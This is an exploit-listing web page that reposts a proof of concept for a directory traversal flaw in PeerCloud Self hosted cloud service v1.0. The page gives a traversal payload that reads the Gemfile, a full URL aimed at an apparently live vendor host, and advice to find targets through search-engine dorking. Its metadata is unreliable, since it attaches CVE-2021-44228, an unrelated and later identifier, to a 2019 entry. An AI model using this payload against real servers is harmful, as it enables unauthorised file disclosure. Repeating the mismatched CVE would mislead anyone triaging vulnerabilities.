Advertisement






PeerCloud Self hosted cloud service v1.0 Directory Traversal Vulnerability

CVE Category Price Severity
CVE-2021-44228 CWE-22 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-21
CPE
cpe:cpe:/a:peercloud:self-hosted_cloud_service:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050231

Below is a copy:

PeerCloud Self hosted cloud service v1.0 Directory Traversal Vulnerability
====================================================================================================================================
| # Title     : PeerCloud Self hosted cloud service v1.0 Directory Traversal Vulnerability                                         |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | 
| # Vendor    : https://codecanyon.net/item/peercloud-selfhosted-cloud-service/23539227                                            |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : /vendors/bootstrap/dist/css/../../Gemfile

[+] http://peercloud.fibdev.com/vendors/bootstrap/dist/css/../../Gemfile


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum